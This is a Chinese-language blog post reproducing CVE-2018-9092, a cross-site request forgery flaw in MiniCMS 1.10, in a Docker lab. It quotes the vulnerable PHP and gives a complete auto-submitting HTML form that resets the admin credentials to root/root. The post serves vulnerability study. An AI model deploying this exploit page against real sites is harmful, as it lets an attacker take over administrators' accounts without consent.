<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta property="og:type" content="article">
<meta property="og:title" content="CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞">
<meta property="og:url" content="http://yoursite.com/2018/08/24/MiniCMS复现/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7O9Gq.png">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7OFMT.png">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7Lxaj.png">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7OCR0.png">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7Opin.png">
<meta property="og:image" content="https://s1.ax1x.com/2018/08/24/P7OPzV.png">
<meta property="og:updated_time" content="2018-08-24T05:47:30.847Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞">
<meta name="twitter:image" content="https://s1.ax1x.com/2018/08/24/P7O9Gq.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <!--<link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">-->
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" results="0" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-MiniCMS复现" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/08/24/MiniCMS复现/" class="article-date">
  <time datetime="2018-08-24T05:39:36.000Z" itemprop="datePublished">2018-08-24</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/CVE复现/">CVE复现</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <hr>
<a id="more"></a>
<h3 id="CVE-2018-9092-MiniCMS-1-10跨站请求伪造漏洞"><a href="#CVE-2018-9092-MiniCMS-1-10跨站请求伪造漏洞" class="headerlink" title="CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞"></a>CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞</h3><p><strong>跨站请求伪造（CSRF）</strong></p>
<p>​    被称为 <strong>one-click attack</strong> 或者 <strong>session riding</strong>，通常缩写为 <strong>CSRF</strong> 或者 <strong>XSRF</strong>， 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比，<strong>XSS</strong> 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户网页浏览器的信任。 </p>
<h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>文件在\MiniCMS\mc-admin\conf.php存在CSRF漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">$display_info = false;</div><div class="line">  </div><div class="line">if (isset($_POST[&apos;save&apos;])) &#123;</div><div class="line">  $user_name_changed = $_POST[&apos;user_name&apos;] != $mc_config[&apos;user_name&apos;];</div><div class="line">  </div><div class="line">  $mc_config[&apos;site_name&apos;] = $_POST[&apos;site_name&apos;];</div><div class="line">  $mc_config[&apos;site_desc&apos;] = $_POST[&apos;site_desc&apos;];</div><div class="line">  $mc_config[&apos;site_link&apos;] = $_POST[&apos;site_link&apos;];</div><div class="line">  $mc_config[&apos;user_nick&apos;] = $_POST[&apos;user_nick&apos;];</div><div class="line">  $mc_config[&apos;user_name&apos;] = $_POST[&apos;user_name&apos;];</div><div class="line">  $mc_config[&apos;comment_code&apos;] = get_magic_quotes_gpc() ? stripslashes(trim($_POST[&apos;comment_code&apos;])) : trim($_POST[&apos;comment_code&apos;]);</div><div class="line">  </div><div class="line">  if ($_POST[&apos;user_pass&apos;] != &apos;&apos;)</div><div class="line">    $mc_config[&apos;user_pass&apos;] = $_POST[&apos;user_pass&apos;];</div><div class="line"></div><div class="line">  $code = &quot;&lt;?php\n\$mc_config = &quot;.var_export($mc_config, true).&quot;\n?&gt;&quot;;</div><div class="line">  </div><div class="line">  file_put_contents(&apos;../mc-files/mc-conf.php&apos;, $code);</div><div class="line">  </div><div class="line">  if ($_POST[&apos;user_pass&apos;] != &apos;&apos; || $user_name_changed) &#123;</div><div class="line">    setcookie(&apos;mc_token&apos;, md5($mc_config[&apos;user_name&apos;].&apos;_&apos;.$mc_config[&apos;user_pass&apos;]));</div><div class="line">  &#125;</div><div class="line">  </div><div class="line">  $display_info = true;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$site_name = $mc_config[&apos;site_name&apos;];</div><div class="line">$site_desc = $mc_config[&apos;site_desc&apos;];</div><div class="line">$site_link = $mc_config[&apos;site_link&apos;];</div><div class="line">$user_nick = $mc_config[&apos;user_nick&apos;];</div><div class="line">$user_name = $mc_config[&apos;user_name&apos;];</div><div class="line">$comment_code = isset($mc_config[&apos;comment_code&apos;]) ? $mc_config[&apos;comment_code&apos;] : &apos;&apos;;</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>问题点如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">if ($_POST[&apos;user_pass&apos;] != &apos;&apos; || $user_name_changed) &#123;</div><div class="line">  setcookie(&apos;mc_token&apos;, md5($mc_config[&apos;user_name&apos;].&apos;_&apos;.$mc_config[&apos;user_pass&apos;]));</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>管理员在修改后台设置的时候，token只验证了登陆后的用户名和密码的md5，所以只要构造一个html页面即可重置管理员的密码</p>
<h4 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h4><p>我在dockerhub上传了漏洞docker镜像</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">docker pull gfattf1/minicms-1.10</div></pre></td></tr></table></figure>
<p>漏洞点</p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7O9Gq.png" alt=""></p>
<p>这里我们的用户名是admin密码是123456</p>
<p>构造exp</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span><span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"Content-Type"</span> <span class="attr">content</span>=<span class="string">"text/html; charset=GB2312"</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>test<span class="tag">&lt;/<span class="name">title</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://192.168.72.128:8989/MiniCMS/mc-admin/conf.php"</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"site_name"</span> <span class="attr">value</span>=<span class="string">"hack123"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"site_desc"</span> <span class="attr">value</span>=<span class="string">"hacktest"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"site_link"</span> <span class="attr">value</span>=<span class="string">"http://192.168.72.128:8989/MiniCMS"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"user_nick"</span> <span class="attr">value</span>=<span class="string">"hack"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"user_name"</span> <span class="attr">value</span>=<span class="string">"root"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"user_pass"</span> <span class="attr">value</span>=<span class="string">"root"</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"comment_code"</span> <span class="attr">value</span>=<span class="string">""</span> /&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"save"</span> <span class="attr">value</span>=<span class="string">" "</span> /&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span></div><div class="line">    document.forms[0].submit();</div><div class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></div></pre></td></tr></table></figure>
<p>只要构造如上的exp去欺骗网站管理员去访问，即可修改网站后台的网站设置</p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7OFMT.png" alt=""></p>
<p>可以看到站点设置里的内容已经被修改</p>
<p>这里使用原密码登陆后台，发现已经无法进入后台设置，且在返回包中未发现mc_taken值</p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7Lxaj.png" alt=""></p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7OCR0.png" alt=""></p>
<p>现在使用修改后的用户名root和密码root进行登陆，发现登陆成功，返回包中包含mc_taken值</p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7Opin.png" alt=""></p>
<p><img src="https://s1.ax1x.com/2018/08/24/P7OPzV.png" alt=""></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/08/24/MiniCMS复现/" data-id="cjxv8eqaw0009vsalx7183ql0" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/代码审计/">代码审计</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/08/30/SQL注入漏洞/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          SQL注入漏洞
        
      </div>
    </a>
  
  
    <a href="/2018/07/30/FiercePhish的简单使用/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">FiercePhish的简单使用</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/CVE复现/">CVE复现</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Docker/">Docker</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux/">Linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/MYSQL/">MYSQL</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Python3/">Python3</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/好玩的/">好玩的</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/代码审计/">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/学习/">学习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/代码审计/" style="font-size: 15px;">代码审计</a> <a href="/tags/学习/" style="font-size: 20px;">学习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/08/">August 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">July 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/04/">April 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/08/30/HongCMS 3.0.0 SQL注入漏洞/">HongCMS 3.0.0 SQL注入漏洞</a>
          </li>
        
          <li>
            <a href="/2018/08/30/SQL注入漏洞/">SQL注入漏洞</a>
          </li>
        
          <li>
            <a href="/2018/08/24/MiniCMS复现/">CVE-2018-9092-MiniCMS 1.10跨站请求伪造漏洞</a>
          </li>
        
          <li>
            <a href="/2018/07/30/FiercePhish的简单使用/">FiercePhish的简单使用</a>
          </li>
        
          <li>
            <a href="/2018/07/23/docker问题/">Docker错误问题（未完）</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="/js/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

  </div>
</body>
</html>